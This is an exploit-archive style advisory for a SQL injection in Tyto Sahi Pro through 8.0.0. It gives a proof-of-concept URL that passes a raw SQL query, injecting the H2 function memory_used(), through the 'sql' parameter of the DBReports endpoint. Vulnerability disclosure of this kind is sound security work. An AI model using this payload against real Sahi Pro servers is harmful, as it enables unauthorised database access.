Sahi pro 8.x sql injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-06-18 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Sahi pro 8.x sql injection is for educational purposes only and if it is used you will do on your own risk!
An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A parameter in the web reports module is vulnerable to SQL injection. This can be exploited to inject SQL queries and run standard h2 system functions.
POC :
vulnerable URL :
''' replace the ip and port of the remote sahi pro server machine '''
# here sql query is passed directly as part of GET request which can be modified to run standard h2 database functions. in the following POC , "memory_used()" function is injected , which is reflected in "status" column of reports page.
http://<ip>:<port>/_s_/dyn/pro/DBReports?sql=SELECT DISTINCT memory_used() AS ROWSTATUS, SCRIPTREPORTS.SCRIPTREPORTID,SCRIPTREPORTS.SCRIPTNAME,SUITEREPORTS.* FROM SUITEREPORTS,SCRIPTREPORTS